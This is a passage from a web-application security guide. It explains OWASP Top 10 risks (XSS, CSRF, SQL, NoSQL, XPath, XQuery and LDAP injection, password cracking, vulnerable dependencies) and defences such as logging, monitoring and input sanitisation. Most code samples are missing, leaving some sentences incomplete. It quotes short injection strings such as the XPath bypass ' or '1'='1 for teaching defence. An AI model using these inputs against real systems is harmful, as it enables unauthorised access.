Take the results from the higher level Asset Identification in the 30,000’ View chapter of Fascicle 0. Remove any that are not applicable, add any relevant from previous chapters, add any newly discovered. Here are some to get you started:
The following is the OWASP Top 10 vulnerabilities for 2003, 2004, 2007, 2010, 2013 and 2017.
As you can see there are some vulnerabilities that we are just not getting better at removing. I’ve listed them in order of most consistent to not quite as consistent:
“Using Components with Known Vulnerabilities” is one that I think we are going to see get worse before it gets better, due to the fact that we are consuming a far greater amount of free and open source. With the increase of free and open source package repositories, such as NPM, NuGet and various others, we are now consuming a far greater number of packages without vetting them before including them in our projects. This is why I’ve devoted a set of sections (“Consuming Free and Open Source”) within this chapter to this problem. There are also sections devoted to this topic in the VPS and Network chapters titled “Using Components with Known Vulnerabilities”. It’s not just a problem with software. We are trying to achieve more, with less of our own work, so in many cases we are blindly trusting other sources. From the attackers perspective, this is an excellent vector to compromise for maximum exploitation.
I see this as an indirect risk to the asset of web application ownership. The same sections in the VPS and Network chapters may also be worth reading if you have not already, as there is some crossover.
Not being able to introspect your application at any given time or being able to know how the health status is, is not a comfortable place to be in and there is no reason you should be there.
Can you tell at any point in time if someone or something is:
How easy is it for you to notice:
The risks here are around accepting untrusted data and parsing it, rendering it, executing it or storing it verbatim to have the same performed on it at a later stage.
Untrusted territory is usually a location that is not close to your back-end executing code. If your back-end is in the cloud that you do not control, I.E. not your hardware, not your staff running it, then you have serious potential issues there as well that you may want to address. I’ve discussed in depth what these issues are in the previous chapters and how to mitigate the risks. Anywhere outside of your local network is untrusted. Inside your local network is semi-trusted. The amount of trust you afford depends on the relationships you have with your staff, how large your staff base is, how large your network is, how APs are managed and many of the other issues I have discussed in the previous chapters, especially Network, and Physical and People from Fascicle0. The closer data gets to the executing back-end code, the less untrustworthy the territory should be. Of course there are many exceptions to this rule as well.
So I could say, just do not trust anyone or anything, but there comes a time and a place that you have to afford trust. Just keep it as close to the back-end executing code as possible.
If you parse, render or execute data that you can not trust, that is data accepted by an unknown user, whether it be through a browser, intercepting communications somewhere along untrusted territory.
This overly complex environment leads to confusion and a perfect haven for hiding malicious code chunks.
Below are a few techniques widely accepted that we need to use on any untrusted data before it makes its travels through your system to be stored or hydrated.
Decide what input is valid by way of a white list (list of input characters that are allowed to be received). Often each input field will have a different white list. Validation is binary, the data is either allowed to be received or not allowed. If it is not allowed, then it is rejected. This is usually not to complicated to work out what is good, what is not and thus rejected. There are a few strategies to use for white listing, such as the actual collection of characters or using regular expressions.
There are other criteria that you can validate against as well, such as:
When some data can pass through (be received) and some is captured by the filter element (thou shalt not pass). OWASP has the RSnake donated seminal XSS cheat sheet which has many tests you can use to check your vulnerability stance to XSS exploitation. This is highly recommended.
Sanitisation of input data is where the input data whether it is in your white list or not is accepted and transformed into a medium that is no longer dangerous. Now it will probably go through validation first. The reason you sanitise character signatures (may be more than single characters, character combinations) not in your white list is a defence in depth strategy. The white list may change in the future due to a change in business requirements and the developer may forget to revise the sanitisation routines. Always think of any security measure as standing on its own when you create it, but standing alongside many other security measures once done.
The following hands on hack demonstrates what a XSS attack is and provides a little insight into some of the damages that it can cause.
A XSS attack is one in which untrusted data enters a web application usually through a web request and is not stopped by validation, filtering or sanitisation. The data is then at some point sent to someone using the same web application without being validated, filtered or sanitised.
One way this can be carried out trivially is to simply buy an add and have that injected into the end users browser. The malicious code can be easily hidden by simply changing additional scripts that are fetched once live. Even fetching a script that fetches a different script under the attackers control.
The main two different types of XSS are Stored/Persistent or Type I and Reflected/Non-Persistent or Type II.
Stored attacks are where the injected code is sent to the server and stored in a medium that the web application uses to retrieve it again to send to another user.
Reflected attacks use the web application in question as a proxy. When a user makes a request, the injected code travels from another medium through the web application (hence the reflecting) and to the end user. From the browsers perspective, the injected code came form the web application that the user made a request to.
The following attack was the first one of five that I demonstrated at WDCNZ in 2015. The attack after this one was a credential harvest based on a spoofed website that hypothetically was fetched due to a spear phishing attack. That particular attack can be found in the “Spear Phishing” section of the People chapter in Fascicle 0.
Theoretically in order to get to the point where you carry out this attack, you would have already been through several stages first. If you are carrying out a penetration testing engagement, it is likely you would have been through the following:
If you are working within a development team you may have found out some other way that your project was vulnerable to XSS.
How ever you got to this point, you are going to want to exhibit the fault. One of the most effective ways to do this is by using BeEF. BeEF clearly shows what is possible when you have an XSS vulnerability in scope and is an excellent tool for effortlessly demonstrating the severity of the fault to all team members and stakeholders.
One of BeEFs primary reasons to exist is to exploit the fact that many security philosophies seem to forget how easy it is to go straight through hardened network perimeters and attack the soft mushy insides of a sub network as discussed in the Fortress Mentality section of the Physical chapter in Fascicle 0. Exposing XSS faults is one of BeEFs attributes.
You can find the video of how this attack is played out at http://youtu.be/92AWyUfJDUw.
This type of attack depends on a fraudulent web resource, be it a website, email, instant message, or program that causes the targets web browser to perform an unintentional action on a website that the target is currently authenticated with.
CSRF attacks target functionality that change state on the server (
DELETE) that the target is currently authenticated with, requests such as changing the targets credentials, making a purchase, moving money at their bank. Forcing the target to retrieve data does not help the attacker.
If you are using cookies (authentication that the browser automatically sends from the client) for storage of client-side session artefacts, CSRF is your main concern, but XSS is also a possible attack vector.
The target needs to submit the request either intentionally or unintentionally. The request could appear to the target as any action. For example:
<iframe>with a form and a script block inside
For No. 1 above, the action attribute of the form for which the target submits could be to the website that the target is already authenticated with, thus a fraudulent request is issued from a web page seemingly unrelated to the website that the target is already authenticated with. This can be seen in the second example below on line 4. The browser plays its part and sends the session Id stored in the cookie. NodeGoat has an excellent example of how this plays out:
Below code can be found at https://github.com/OWASP/NodeGoat/:
The below attack code can be found at the NodeGoat tutorial for CSRF, along with the complete example that ckarande crafted, and an accompanying tutorial video of how the attack plays out:
For No. 2 above, is similar to No. 1, but the target does not have to action anything once the fraudulent web page is loaded. The script block submits the form automatically, thus making the request to the website that the target is already authenticated with, the browser again playing its part in sending the session Id stored in the cookie:
injection occurs when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can cause the interpreter to execute commands that would otherwise not be, or accessing data without proper authorization.
In order for injection attacks to be successful, untrusted data must be unsuccessfully validated, filtered and sanitised before it reaches the interpreter.
Injection defects are often easy to discover simply by examining the code that deals with untrusted data, including internal data. These same defects are often harder to discover when black-box testing, either manually or via fuzzers. Defects can range from trivial to complete system compromise.
As part of the discovery stage, the attacker can test their queries and start to build up what they think the underlying structure looks like that they are attacking with any number of useful on-line query test tools, such as freeformatter.com. This allows the attacker to make as little noise to signal ratio as possible.
One of the simplest and quickest vulnerabilities to fix is SQL Injection, yet it is still top of the hit lists. I am going to hammer this home some more. Also checkout the podcast I hosted with Haroon Meer as guest on Network Security for Software Engineering Radio. Haroon discussed using SQLi for data exfiltration.
There are two main problems here.
NoSQL data stores often provide greater performance and scaling benefits, but in terms of security, are disadvantaged due to far fewer relational and consistency checks.
Because there are so many types of NoSQL data store, crafting the attacks is often implementation specific, and because of that, the countermeasures are also implementation specific, making it even more work to provide a somewhat secure environment for your untrusted data to pass through. It often feels like there is no safe passage.
I can not possibly cover all of the types of NoSQL data store, so the below is an example of some mongodb.
A typical SQL query used to select a user based on their username and password might look like the following:
$password fields were not properly validated, filtered and sanitised, an attacker could supply
as the username and the resulting query would look like:
The equivalent of a MongoDB query could be:
One way an attacker could attempt to bypass the password if the untrusted data was not being validated would be to supply a username of:
and a password of:
The resulting query would then look like:
$gt comparison operator is used here to select those documents where the value of the password is greater than
"", which always results in true because empty passwords are not permitted. Check the NodeGoat tutorial for additional information.
The following functions are easily exploited by an attacker by simply supplying the code they want to execute as a string of text input:
eval function executes the string of code it is passed with the privileges of the caller.
setInterval functions allow you to pass a string of code as the first argument, which is compiled and executed on timer expiration (with
setTimeout), and at intervals (with
Function constructor takes an arbitrary number of string arguments which are used as the formal parameter names within the function body that the constructor creates. The last argument passed to the
Function constructor is also a string, but it contains the statements that are to be executed as the
Function object that is returned.
The purposely vulnerable Node Web Application NodeGoat, provides some simple examples in the form of executable code including some absolute bare minimum countermeasures, a tutorial with videos of exploiting Command Injection in the form of a Denial of Service (DoS), by passing
through some input fields of the Web UI. It also covers discovery of the names of the files on the target web servers file system:
The attacker can take this further by writing new files and executing files on the server.
Many web applications take untrusted data, often from HTTP requests and pass this data directly to the Operating System, its programs, or even other systems, often by APIs, which is now addressed by the OWASP Top 10 A10 Under protected APIs
Also check out the Additional Resources chapter for command injection attack techniques.
XML injection techniques usually consist of a discovery stage followed by full exploitation if successful:
]]>allowing an attacker to form executable code
and witnessing how the parser deals with the data.
There are a number of XML attack categories exploitable via injection that target weaknesses such as the following that Adam Bell presented at the OWASP New Zealand Day conference in 2017 that I helped to run. Adams talk was called: “XML Still Considered Dangerous:
Check out Adams slide-deck at the OWASP NZ Day wiki for some interesting examples.
There is a lot that can go wrong in XSLT, the following is a collection of some of the vulnerabilities to be aware of:
Similarly to generic injection, when XPath incorporates untrusted data that has not been validated, filtered and sanitised based on the execution context in question, this is discussed in the “What is Sanitisation” section of the Lack of Input Validation, Filtering and Sanitisation section of Identify Risks, the intended logic of the query can be modified. This allows an attacker to inject purposely malformed data into a website, then by making educated guesses based on what is returned, including the returned data and any error messages, the attacker can build a picture of how the XML structure looks. Similar to XML Injection, the attacker will usually carry out this discovery stage followed by full exploitation if successful.
Although this attack technique is similar to SQLi, XPath has no provision for commenting out tails of expressions:
XPath is a standards based language, unlike SQL, its syntax is implementation independent, this allows attacks to be automated across many targets that use user input to query XML documents.
Unlike SQL where specific commands and queries are run as specific users, and thus the principle of least privilege can be applied to any given command or query based on the user running it, with XPath there is no notion of Access Control Lists (ACLs), this means that a query can access every part of the XML document. So for example, if user credentials are being stored in an XML document, they can be retrieved and allow the attacker to elevate their privileges to those of other users, perhaps administrators if the administrators credentials are stored in the XML document.
Let us use the following XML document for examples:
Blind injection is a technique used in many types of injection. A blind injection attack is used where the attacker does not know what the underlying query, or in the case of XPath, XML document looks like, and/or the feedback from the application reveals little detail in terms of data or error messages. Often booleanised queries and/or XML Crawling are used to facilitate blind injection attacks.
Booleanised Queries are those that return very granular true/false information based on very small amounts of data supplied by the attacker.
The following XPath query returns the first character of the first child node (no mater what it is called) of the first User:
The following XPath query returns the length of the forth element (no mater what it is called) of the first User:
XML Crawling allows the attacker to get to know what the XML document structure looks like.
For example, the following reveals that the number of
Users is 2:
The following reveals that the length of the value at the fourth position of the child node (no mater what it is called) of the first
User is in fact 9 characters long. Is the
Password nine characters long? True.
The following query can be used to confirm that the first character of the fourth child node (no mater what it is called) of the first
User is in fact
Checkout the OWASP XML Crawling documentation for further details. The queries at the OWASP documentation did not work for me, hence why I have supplied ones that do.
Using booleanised queries can be very good for automated attacks, usually many of these granular tests will need to be performed, but because they are so small, an attacker can aggregate them, making them very versatile.
Continuing on: If our target application contains logic to retrieve the account type so long as the user provides their username and password, that logic may look similar to the following, once the legitimate administrator has entered their credentials:
If the application does not take the countermeasures discussed, and the attacker enters the following:
' or '1'='1
' or '1'='1
Then the above query will look more like the following:
Which although the attacker has not supplied a valid
Password, according to the XPath query, they are still authenticated, because the query will always evaluate to true. This is called authentication bypass for obvious reasons. You may notice that this attack looks very similar to many SQLi attacks.
The available XPath functions and XSLT specific additions to XPath are documented at Mozilla Developer Network (MDN)
Technically, XPath is used to select parts of an XML document, it has no provision for updating, in saying that, command injection can be used to modify data that XPath returns. Standard language libraries usually provide functionality for modifying XML documents, along with the XML Data Modification Language (DML) that we will discuss soon in the next section.
XQuery being a superset of XPath, suffers from the same vulnerabilities as XPath, plus the SQL-like
RETURN (FLWOR) expression abilities. Hopefully coming as no surprise, the attack vectors are a combination of those discussed in XPath Injection and SQLi. The canonical example is provided below thanks to projects.webappsec.org:
If the query to retrieve the user
bobm was using a string literal from the users input (
bobm), it may look similar to the following:
An attacker could exploit the query by providing:
something" or ""="
which would form the following query:
which upon execution would yield all of the
Something else to keep in mind is that XQuery also has an extension called the XML Data Modification Language (DML), which is commonly used to update (
replace value of) XML documents.
The same generic injection information is applicable to LDAP
Successful LDAP injection attacks could result in the granting of permissions to unauthorised queries and/or adding, deleting or modifying of entries in the LDAP tree. Because LDAP is used extensively for user authentication, this is a particularly viable area for attackers.
LDAP uses Polish notation (PN), or normal Polish notation (NPN), or simply prefix notation, which has the distinguishing feature of placing operators to the left of their operands
One of the canonical examples, is a web application that takes the users credentials and verifies their authenticity, if successful, the user is authenticated and granted access to specific resources.
The LDAP filter used to check whether the supplied username and password of a user is correct, might look similar to the following:
With user input:
the search filter would look similar to the following:
(&) we used that did not contain any embedded filters is called the LDAP true filter, and will always match any target entry. This allows the attacker to compare a valid
true, the attacker can subsequently use any password as only the first filter is processed by the LDAP server.
Lack of captchas are a risk, but so are captchas themselves…
What is the problem here? What are we trying to stop?
Bots submitting. What ever it is, whether advertising, creating an unfair advantage over real humans, link creation in attempt to increase SEO, malicious code insertion, you are more than likely not interested in accepting it.
What do we not want to block?
People submitting genuinely innocent input. If a person is prepared to fill out a form manually, even if it is spam, then a person can view the submission and very quickly delete the validated, filtered and possibly sanitised message.
Also consider reviewing the Storage of Secrets subsections in the Cloud chapter.
The reason I have tagged this as moderate is because if you take the countermeasures, it doesn’t have to be a disaster.
The New Zealand Intelligence Service recently told Prime Minister John Key that this was one of the 6 top threats facing New Zealand. “Cyber attack or loss of information and data, which poses financial and reputational risks.”
There are many examples of data-store compromise happening on a daily basis. If organisations took the advice I outline in the countermeasures section the millions of users would not have their identifies stolen. Sadly the advice is rarely followed. The Ashley Madison debacle is a good example. Ashley Madisons entire business relied on its commitment to keep its clients (37 million of them) data secret, provide discretion and anonymity.
“Before the breach, the company boasted about airtight data security but ironically, still proudly displays a graphic with the phrase “trusted security award” on its homepage”
“We worked hard to make a fully undetectable attack, then got in and found nothing to bypass…. Nobody was watching. No security. Only thing was segmented network. You could use Pass1234 from the internet to VPN to root on all servers.”
“Any CEO who isn’t vigilantly protecting his or her company’s assets with systems designed to track user behavior and identify malicious activity is acting negligently and putting the entire organization at risk. And as we’ve seen in the case of Ashley Madison, leadership all the way up to the CEO may very well be forced out when security isn’t prioritized as a core tenet of an organization.”
Other notable data-store compromises were LinkedIn with 6.5 million user accounts compromised and 95% of the users passwords cracked in days. Why so fast? Because they used simple hashing, specifically SHA-1. EBay with 145 million active buyers. Many others coming to light regularly.
Are you using well salted and quality strong key derivation functions (KDFs) for all of your sensitive data? Are you making sure you are notifying your customers about using high quality passwords? Are you informing them what a high quality password is? Consider checking new user credentials against a list of the most frequently used and insecure passwords collected. I discussed Password Lists in the Tooling Setup chapter. You could also use wordlists targeting the most commonly used passwords, or create an algorithm that works out what an easy to guess password looks like, and inform the user that it would be easy to guess by an attacker.
Remember we covered Password Profiling in the People chapter where we essentially made good guesses, both manually and with the use of profiling tools, around the end users passwords, and then feed the short-list to a brute forcing tool. Here we already have the password hashes. We just need to find the source passwords that created the hashes. This is where cracking comes in.
When an attacker acquires a data-store or domain controller dump of hashed passwords, they need to crack the hashes in order to get the passwords. How this works, is the attacker will find or create a suitable password list of possible passwords. The tool used will attempt to create a hash of each of these words based on the hashing algorithm used on the dump of hashes. Then compare each dumped hash with the hashes just created. When a match is found, we know that the word in our wordlist used to create the hash that matches the dumped hash is in fact a legitimate password.
A smaller wordlist is going to take less time to create the hashes. As this is often an off-line attack, a larger wordlist is often preferred over a smaller one because the number of generated hashes will be greater, which when compared to the dump of hashes means the likelihood of a greater number of matches is increased.
As part of the hands on hack in the SQLi section, we obtained the password hashes via SQL injection from the target web application DVWA (part of the OWASP Broken Web Application suite (VM)). We witnessed how an attacker could obtain the passwords from the hashed values retrieved from the database.
Also brought to light by the OWASP Top 10 risks “No. 2 Broken Authentication and Session Management”.
With this category of attacks, your attacker could be either someone you do or do not know. Possibly someone already with an account, an insider maybe, looking to take the next step which could be privilege escalation or even just alteration so that they have access to different resources by way of acquiring other accounts. Some possible attack vectors could be:
In the Countermeasures section I go through some mature and well tested libraries and other technologies, and details around making them fit into a specific business architecture.
Consider what data could be exposed from any of the accounts and how this could be used to gain a foot hold to launch further alternative attacks. Each step allowing the attacker to move closer to their ultimate target, the ultimate target being something hopefully discussed during the Asset Identification phase or taking another iteration of it as you learn and think of additional possible targeted assets.
Often the line between the following two concepts gets blurred, sometimes because where one starts and one ends is often not absolute or clear, and sometimes intentionally. Neither help new comers and even those used to working with the concepts get to grips with which is which and what the responsibilities of each include.
The process of determining whether an entity (be it person or something else) is who or what it claims to be.
Being authenticated, means the entity is known to be who or what it/he/she claims to be.
The process of verifying that an entity (usually requesting)(be it person or something else) has the right to a resource or to carry out an action, then granting permission requested.
Being authorised, means the entity has the power or right to certain privileges.
Don’t build your own authentication, authorisation or session management system unless it’s your core business. It’s too easy to get things wrong and you only need one defect in order to be compromised. Leave it to those that have already done it or do it as part of their core business and have already worked through the defects.
The things I see that seem to get many developers into trouble:
There are so many use cases with the wider cryptography topic. There is no substitute for learning about your options, which to use in any given situation and how to use them.
Little trust should be placed in the browser and how it generally fails to manage attacks due to the complexities discussed in both Risks and Countermeasures sections of “Lack of Input Validation, Filtering and Sanitisation”. The browser has enough trouble getting all the technologies to work together and inside of each other, let-a-lone stopping malicious code fragments that do work from working. As most web developers have worked out, the browser is purposely designed to make even syntactically incorrect code work correctly.
The browser was designed to download and run potentially malicious, untrusted code from arbitrary locations on the fly. The browser in most cases doesn’t know what malicious code is, and often the first payload is not malicious, but simply fetches other code that may fetch other code that eventually will be malicious.
Web development is hard. Web security is harder still.
What’s also really good to see is SJCL pushing consumers down the right path and issuing warnings around primitives that have issues. For example the warning against using CBC. I discuss this further in the risks that solution causes section.
Other than the countermeasure, This is probably the best offering we have for crypto in the browser. It has sensible defaults, good warnings, not to many options to understand in order to make good choices. This is one of those libraries that guides the developer down the right path.
Encrypts your plain text using the AES block cypher with a choice of cipher modes CCM or OCB2. AES is the industry-standard block-cipher for this purpose, one of the better choices for crypto in the browser if it must be done. AES comes in three forms. 128 bit (very efficient), 192 bit and 256 bit. The modes of operation that SJCL have provided for use with AES are the following two Authenticated Encryption with Associated Data (AEAD) ciphers:
This is where A9 (Using Components with Known Vulnerabilities) of the 2017 OWASP Top 10 comes in.
We are consuming far more free and open source libraries than we have ever before. Much of the code we are pulling into our projects is never intentionally used, but is still adding surface area for attack. Much of it:
There are some very sobering statistics, also detailed in “the morning paper” by Adrian Colyer, on how many defective libraries we are depending on. We are all trying to get things done faster, and that in many cases means consuming someone else’s work rather than writing our own code.
Many vulnerabilities can hide in these external dependencies. It is not just one attack vector any more, it provides the opportunity for many vulnerabilities to be sitting waiting to be exploited. If you do not find and deal with them, I can assure you, someone else will.
Running any type of scripts from non local sources without first downloading and inspecting them, and checking for known vulnerabilities, has the potential to cause massive damage, for example, destroy or modify your systems and any other that may be reachable, send sensitive information to an attacker, or many other types of other malicious activity.
There is a good example of what the Insecure Direct Object References risk looks like in the NodeGoat web application. Check out the tutorial, along with the video of how the attack is played out, along with the sample code and recommendations of how to fix.
The web application is being attacked with unusual requests.
Attackers probe for many types of weaknesses within the application, when they think they find a flaw, they attempt to learn from this and refine their attack technique.
Attackers have budgets just like application developers/defenders. As they get closer to depleting their budget without gaining a foothold, they become more impulsive, start making more noise, and mistakes creep into their techniques, which makes it even more obvious that their probes are of a malicious nature.
Every decision made in a project needs to factor in security. Just as with other non functional requirements, retrofitting means undoing what you’ve already done and rebuilding. Maintaining the mindset of going back later and bolting on security doesn’t work.
Often I’ll hear people say “well we haven’t been hacked so far”. This shows a lack of understanding. I usually respond with “That you are aware of”. Many of the most successful attacks go unnoticed. Even if you or your organisation haven’t been compromised, business’s are changing all the time, along with the attack surface and your assets. It’s more so a matter of when, than if.
One of the additional resources useful at this stage is the MS Application Threats and Countermeasures.
Also refer to the “Lack of Visibility” section in the VPS chapter, where I discuss a number of tried and tested solutions. Much of what we discuss here will also make use of, and in some cases, such as the logging and monitoring depend on components being set-up from the VPS chapter’s Countermeasures sections within the Lack of Visibility sections.
As Bruce Schneier said: “Detection works where prevention fails and detection is of no use without response”. This leads us to application logging.
With good visibility we should be able to see anticipated and unanticipated exploitation of vulnerabilities as they occur and also be able to go back and review/audit the events. Of course you’re still going to need someone engaged enough (discussed in the People chapter of Fascicle 0) to be reviewing logs and alerts.
When it comes to logging in NodeJS, you can’t really go past winston. It has a lot of functionality and what it does not have is either provided by extensions, or you can create your own. It is fully featured, reliable and easy to configure like NLog in the .NET world.
I also looked at
express-winston, but could not see why it needed to exist.
winston-syslog, it seems to be what a lot of people are using. I think it may be due to the fact that
winston-syslog is the first package that works well for winston and syslog.
If going this route, you will need the following in your
I Also looked at
winston-syslogudp, but they did not measure up for me.
If you do not need to push syslog events to another machine, and I don’t mean pushing logs, then it does not make much sense to push through a local network interface when you can use your posix syscalls as they are faster and safer. Line 7 below shows the open port.
If going this route, you will need the following in your
/etc/rsyslog.conf instead of the above, you will still be able to push logs off-site, as discussed in the VPS chapter under the Logging and Alerting section in Countermeasures:
Now you can see on line 7 below that the syslog port is no longer open:
Logging configuration should not be in the application startup file. It should be in the configuration files. This is discussed further under the “Store Configuration in Configuration files” section.
Notice the syslog transport in the configuration below starting on line 39.
In development I have chosen here to not use syslog. You can see this on line 3 below. If you want to test syslog in development, you can either remove the logger object override from the
devbox1-development.js file or modify it to be similar to the above. Then add one line to the
/etc/rsyslog.conf file to turn on. As mentioned in a comment above in the
default.js config file on line 44.
In production we log to syslog and because of that we do not need the file transport you can see configured starting on line 30 above in the
default.js configuration file, so we set it to null as seen on line 6 below in the
I have gone into more depth about how we handle syslogs in the VPS chapter under the Logging and Alerting section, where all of our logs including these ones get streamed to an off-site syslog server. Thus providing easy aggregation of all system logs into one user interface that DevOpps can watch on their monitoring panels in real-time and also easily go back in time to visit past events. This provides excellent visibility as one layer of defence.
There were also some other options for those using Papertrail as their off-site syslog and aggregation PaaS, but the solutions were not as clean as simply logging to local syslog from your applications and then sending off-site from there. Again this is discussed in more depth in the “Logging and Alerting” section in the VPS chapter.
logger.js file wraps and hides extra features and transports applied to the logging package we are consuming.
When the app first starts it initialises the logger on line 15 below.
Here are some examples of how you can use the logger. The
logger.log(level can be replaced with
logger.<level>( where level is any of the levels defined in the
default.js configuration file above:
As an architectural concern, also consider hiding cross cutting concerns like logging using Aspect Oriented Programming (AOP).
There are a couple of ways of approaching monitoring. You may want to see and be notified of the health of your application only when it is not fine (sometimes called the dark cockpit approach), or whether it is fine or not. Personally I like to have both
As discussed in the VPS chapter, Monit is an excellent tool for the dark cockpit approach. It’s easy to configure. Monit Has excellent easy to read, short documentation which is easy to understand, the configuration file has lots of examples commented out ready for you to take as is and modify to suite your environment. Remember I provided examples of monitoring a VPS and NodeJS web application in the VPS chapter. I’ve personally had excellent success with Monit. Check the VPS chapter Monitoring section for a refresher. Monit doesn’t just give you monitoring, it can also perform pre-defined actions based on current states of many VPS resources and their applications.
Just as collectd can collect and send data to graphite directly if collectd agent and server are on the same machine, or indirectly via a collectd server on another machine to provide continual system visibility, statsd can play a similar role as collectd agent/server but for our applications.
Statsd is a lightweight NodeJS daemon that collects and stores the statistics sent to it for a configurable amount of time (10 seconds by default) by listening for UDP packets containing them. Statsd then aggregates the statistics and flushes a single value for each statistic to its
backends (graphite in our case) using a TCP connection. The
flushInterval needs to be the same as the
retentions interval in the Carbon
/etc/carbon/storage-schemas.conf file. This is how statsd gets around the Carbon limitation of only accepting a single value per interval. The protocol that statsd expects to receive looks like the following, expecting a type in the third position instead of the timestamp that Carbon expects:
<type> is one of the following:
This tells statsd to add up all of these values that it receives for a particular statistic during the flush interval and send the total on flush. A sample rate can also be provided from the statsd client as a decimal of the number of samples per event count:
So if the statistic is only being sampled 1/10th of the time:
This value needs to be the timespan in milliseconds between a start and end time. This could be for example, the timespan that it took to hash a piece of data to be stored such as a password, or how long it took to pre-render an isomorphic web view. Just as with the count type, you can also provide a sample rate for timing as well. Statsd does quite a lot of work with timing data, it works out percentiles, mean, standard deviation, sum, lower and upper bounds for the flush interval. This can be very useful for when you are making changes to your application and want to know if those changes are slowing it down.
A gauge is a snap-shot of a reading in your application code, like your cars fuel gauge for example. As opposed to the count type which is calculated by statsd, a gauge is calculated at the statsd client.
Sets allow you to send the number of unique occurrences of events between flushes, so for example you could send the source address of every request to your web application and statsd would workout the number of unique source requests per flush interval.
So for example if you have statsd running on a server called graphing-server with the default port, you can test sending a count metric with the following command:
The server and port are specified in the config file that you create for yourself. You can create this from the
exampleConfig.js as a starting point. In
exampleConfig.js you will see the server and port properties. The current options for server are tcp or udp, with udp being the default. The server file must exist in the
One of the ways we can generate statistics to send to our listening statsd daemon is by using one of the many language specific statsd clients, which make it trivially easy to collect and send application statistics via a single routine call.
What ever you can do to help establish clean lines of separation of concerns in terms of both domain and technology, and keep as much as possible as simple as possible, the harder it will be for defects and malicious code to hide.
Your staple practises when it comes to defending against potentially dangerous input are validation and filtering. There are cases though when the business requires that input must be accepted that is dangerous yet still valid. This is where you will need to implement sanitisation. There is a lot more research and thought involved when you need to perform sanitisation, so the first cause of action should be to confirm that the specific dangerous yet valid input is in-fact essential.
Attempt to use well tested, battle hardened language specific libraries that know how to validate, filter and sanitise.
Create enough “Evil Test Conditions” as discussed in the Process and Practises chapter of Fascicle 0 to verify that:
WebComponents have come a long way and I think thy are perfect for this task.
With WebComponents, you get to create your own custom elements, an HTML tag. The browser will understand these natively, so they will work with any framework or library you are using. In order to define your own custom element, the tag name you define must be all lower case and must contain at least one hyphen used for separating name-spaces. No elements will be added to HTML, SVG or MathML that contain hyphens.
Each Custom Element (
my-password for example) has a corresponding HTML Import (
Custom Elements are currently only natively supported in Chrome and Opera, but we have the webcomponents.js set of polyfills which means we can all use WebComponents.
Polymer is a library that helps you write WebComponents and mediates with the browser on your behalf, it also polyfills.
Custom Element authors can also expose Custom CSS properties that they think consumers may want to apply values to, these styles are prefixed with
-- and are essentially an interface to a backing (CSS property) field, which would otherwise be inaccessible.
The Custom Element author can also decide to define a set of CSS properties as a single Custom CSS property, called a Custom CSS mixin, and then allow all of the properties within the set to be applied to a specific CSS rule in an elements local DOM. This is done using the CSS @apply rule. This allows consumers to mix in any styles within the single Custom CSS property, but only intentionally by using the
Polymer also has a large collection of Custom Elements already created for you out of the box. Some of these Custom Elements are perfect for constraining and providing validation and filtering of input types, credit card details for example.
Escaping is a technique used to sanitise. Escaped data will still render in the browser properly. Escaping simply lets the interpreter know that the data is not intended to be executed and thus prevents the attack.
There are a number of types of escaping you need to know about depending on where you may be intending on inserting untrusted data. Work through the following set of rules in order:
All of the above points are covered in depth in the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet. Familiarise yourself with the rules before completing any custom sanitisation work.
The following example was taken from a project I worked on a few years ago.
Client side validation, filtering and sanitisation is more about UX (User Experience) helping the honest user by saving round trip communications to the server than stopping an attacker, as an attacker will simply by-pass any client side defences.
We needed to apply a white list to all characters being entered into the
value attribute of
input elements of
type="text" and also
textarea elements. The requirement was that the end user could not insert invalid characters into one of these fields and by insert we mean:
The following was the strategy that evolved. Performance was measured and even with an interval much lower than the 300 milliseconds, the performance impact was negligible. As soon as any non white list character(s) was entered, it was immediately deleted within 300 milliseconds.
$ references jQuery.
Each time we changed the page, we cleared the interval and reset it for the new page.
HTML5 provides the
pattern attribute on the
input tag, which allows us to specify a regular expression that the text received is checked against. Although this does not apply to
textareas. Also when validation occurs is not specified in the HTML specification, so this may not provide enough control.
Now what we do here is extend the
String prototype with a function called
Just before any user input was sent back to the server, we would check each of the fields that we were receiving input from by doing the following:
“HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a
<div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you’re religious about using quotes around your attributes.”
OWASP XSS Prevention Cheat Sheet
For us, this would be enough, as we would be
HTML escaping our
textarea elements and we were happy to make sure we were religious about using quotes around the
value attribute on
“But HTML entity encoding doesn’t work if you’re putting untrusted data inside a
<script> tag anywhere, or an event handler attribute like
onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you’re putting untrusted data into.”
OWASP XSS Prevention Cheat Sheet
Rule #2 of the OWASP XSS Prevention Cheat Sheet discusses attribute escaping. Now because we were only using
value attributes and we had the luxury of being able to control the fact that we would always be using properly quoted attributes, we didn’t have to take this extra step of escaping all (other than alphanumeric) ASCII characters that is values less than 256 with the
&#xHH format to prevent switching out of the attribute context.
Because I wanted to be sure about not being able to escape out of the attributes context if it was properly quoted I tested it. I created a collection of injection attacks, none of which worked. If you enter something like the following into the attribute
value of an
input element where
type="text", then the first double quote will be interpreted as the corresponding quote and the end double quote will be interpreted as the end quote of the
onmouseover attribute value.
All the legitimate double quotes are interpreted as the double quote
" and all illegitimate double quotes are interpreted as the character value. This is what you end up with:
Now in regards to the code comments in the block of code above titled “Sanitisation using escaping”, I mentioned having to double escape character references. We were using
XSL for the
HTML because we needed to perform transformations before delivering to the browser. Because we were sending the strings to the browser, it was easiest to single decode the double encoded
HTML on the service side only. Now because we were still focused on the client side sanitisation and we would soon be shifting our focus to making sure we cover the server side, we knew we were going to have to create some sanitisation routines for our .NET service. Because the routines are quite likely going to be static and we were pretty much just dealing with strings, we created an extensions class in a new project in a common library we already had. This would provide the widest use from our sanitisation routines. It also allowed us to wrap any existing libraries or parts of them that we wanted to get use of.
Now when we ran our
xslt transformation on the service, we chain our new extension method on the end. Which gives us back a single encoded string that the browser is happy to display as the decoded value.
Now turning our attention to the server side… Untrusted data (data entered by a user), should always be treated as though it may contain attack code. This data should not be sent anywhere without taking the necessary steps to detect and neutralise the malicious code depending on which execution contexts it will pass through.
